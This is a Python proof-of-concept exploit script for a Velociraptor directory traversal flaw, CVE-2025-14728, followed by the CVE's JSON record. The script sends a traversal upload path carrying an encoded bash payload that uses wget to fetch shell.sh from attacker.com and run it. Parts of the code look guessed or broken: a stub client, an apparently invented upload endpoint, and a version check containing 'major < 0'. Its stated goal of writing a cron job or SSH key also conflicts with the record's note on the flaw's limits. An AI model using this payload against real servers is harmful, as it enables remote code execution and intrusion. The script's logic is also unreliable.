CVE-2025-14728

# CVE-2025-14728 PoC - Velociraptor Directory Traversal # This PoC demonstrates the directory traversal vulnerability in Velociraptor # where filenames ending with '.' can bypass path sanitization import requests import urllib.parse import base64 # Target Velociraptor server TARGET_URL = "http://target-velociraptor-server:8000" def create_malicious_client(): """Create a malicious Velociraptor client configuration""" # Generate a client with crafted certificate client_id = "C.1234567890abcdef" return client_id def exploit_directory_traversal(): """ Exploit the directory traversal vulnerability by uploading a file to a path outside the datastore directory. The key is to use a directory name ending with '.' which only gets encoded as %2E for the final '.' """ # Craft the malicious upload path # Target: /etc/ (directory ending with %2E) # The path traversal sequence: ../../../etc%2E # This resolves to: ../../../etc. malicious_path = "../../../etc%2E" # File content to write (e.g., a cron job or SSH key) malicious_content = b"""#!/bin/bash # Malicious payload /usr/bin/wget http://attacker.com/shell.sh -O /tmp/shell.sh chmod +x /tmp/shell.sh /tmp/shell.sh """ # Encode the content encoded_content = base64.b64encode(malicious_content).decode() # Prepare the upload request upload_request = { "client_id": create_malicious_client(), "path": malicious_path, "filename": "malicious_file", "content": encoded_content, "operation": "UploadFile" } # Send the exploit request try: response = requests.post( f"{TARGET_URL}/api/v1/upload", json=upload_request, verify=False, timeout=30 ) if response.status_code == 200: print("[+] File uploaded successfully via directory traversal!") print(f"[+] File written to path containing: {malicious_path}") else: print(f"[-] Upload failed: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") def verify_vulnerability(): """Verify if the target is vulnerable""" # Check Velociraptor version endpoint version_url = f"{TARGET_URL}/api/v1/version" try: response = requests.get(version_url, timeout=10) if response.status_code == 200: version_info = response.json() version = version_info.get('version', 'unknown') print(f"[*] Detected Velociraptor version: {version}") # Check if version is vulnerable major, minor, patch = map(int, version.split('.')[:3]) if major < 0 or (major == 0 and minor < 75) or (major == 0 and minor == 75 and patch < 6): print("[!] Target is VULNERABLE to CVE-2025-14728") return True else: print("[+] Target is NOT vulnerable (version >= 0.75.6)") return False except Exception as e: print(f"[-] Version check failed: {e}") return None if __name__ == "__main__": print("=" * 60) print("CVE-2025-14728 Velociraptor Directory Traversal Exploit") print("=" * 60) # First verify if target is vulnerable is_vulnerable = verify_vulnerability() if is_vulnerable: print("\n[*] Launching exploit...") exploit_directory_traversal() else: print("\n[!] Cannot proceed - target may not be vulnerable")

{"cve": {"id": "CVE-2025-14728", "sourceIdentifier": "[email protected]", "published": "2025-12-29T19:15:55.277", "lastModified": "2026-02-20T19:37:59.517", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Rapid7 Velociraptor versions before 0.75.6 contain a directory traversal issue on Linux servers that allows a rogue client to upload a file which is written outside the datastore directory. Velociraptor is normally only allowed to write in the datastore directory. The issue occurs due to insufficient sanitization of directory names which end with a \".\", only encoding the final \".\" AS \"%2E\".\n\n\nAlthough files can be written to incorrect locations, the containing directory must end with \"%2E\". This limits the impact of this vulnerability, and prevents it from overwriting critical files."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rapid7:velociraptor:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.75.6", "matchCriteriaId": "7DB5420C-F7CB-4A8E-87DE-5AC9A5AF14A5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}]}]}], "references": [{"url": "https://docs.velociraptor.app/announcements/advisories/cve-2025-14728/", "source": "[email protected]", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}}